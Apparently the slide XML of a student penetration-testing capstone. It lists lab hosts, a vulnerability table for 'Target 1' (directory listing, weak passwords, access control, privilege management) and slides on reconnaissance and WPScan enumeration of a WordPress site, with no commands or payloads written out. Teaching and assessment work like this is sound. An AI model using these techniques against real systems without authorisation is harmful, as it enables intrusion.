            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>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IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="28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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="28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endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ELK Server</a:t>
            </a:r>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IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="28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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Capstone</a:t>
            </a:r>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IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2347" name="Google Shape;2347;p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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2348" name="Google Shape;2348;p4" descr="Diagram&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593075" y="2897064"/>
            <a:ext cx="10608398" cy="100569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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="0"/>
            <a:ext cx="24443101"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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2354" name="Google Shape;2354;p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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2355" name="Google Shape;2355;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801"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a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2356" name="Google Shape;2356;p5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176962" y="4376284"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{AB76892F-4A5C-4B29-B97E-A2BCD0243B9D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5540350">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="9689125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6766150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1135850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="4400"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>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b="1" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" b="1" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425" anchor="b"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1706800">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CWE-548</a:t>
                      </a:r>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Exposure of Information through Directory Listing</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Low</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>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1135850">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CWE-521</a:t>
                      </a:r>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Weak Password Requirements</a:t>
                      </a:r>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solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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1135850">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CWE-284</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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Improper Access Control</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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1135850">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CWE-269</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Improper Privilege Management</a:t>
                      </a:r>
                      <a:endParaRPr sz="44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u="none" strike="noStrike" cap="none">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="4400" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2361" name="Google Shape;2361;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731334" y="773067"/>
            <a:ext cx="22914824" cy="12246448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2362" name="Google Shape;2362;p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t>6</a:t>
            </a:fld>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2363" name="Google Shape;2363;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343" y="4936267"/>
            <a:ext cx="22914900" cy="2745600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750"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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploits Used:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2364" name="Google Shape;2364;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-87421" y="34962844"/>
            <a:ext cx="56659498" cy="1612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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2370" name="Google Shape;2370;p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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2371" name="Google Shape;2371;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="98667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Browsing the public-facing website, the URL directory tree structure was visible. The information gathered provided valuable data using passive reconnaissance.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2372" name="Google Shape;2372;p7" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="913102" y="6145304"/>
            <a:ext cx="7164453" cy="3489072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2373" name="Google Shape;2373;p7" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569303" y="4233023"/>
            <a:ext cx="8296666" cy="3737475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2374" name="Google Shape;2374;p7" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13040880" y="10949468"/>
            <a:ext cx="9029960" cy="1423200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2375" name="Google Shape;2375;p7" descr="Graphical user interface, text, application, website&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051491" y="10691476"/>
            <a:ext cx="10751076" cy="1939185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2376" name="Google Shape;2376;p7" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11635802" y="8243229"/>
            <a:ext cx="11661337" cy="21607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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-379452" y="17585"/>
            <a:ext cx="25108452"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Exposure of Information through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2382" name="Google Shape;2382;p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8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2383" name="Google Shape;2383;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1924650"/>
            <a:ext cx="22942800" cy="110292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WordPress has many known vulnerabilities, so active reconnaissance using the WPScan tool was used to enumerate WordPress websites.</a:t>
            </a:r>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914400" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pP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It showed us URLs we had direct access to, including known attack vectors:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2384" name="Google Shape;2384;p8" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7607603" y="3611144"/>
            <a:ext cx="7648440" cy="4895000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2385" name="Google Shape;2385;p8" descr="Text&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703374" y="11053101"/>
            <a:ext cx="8663920" cy="1222114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
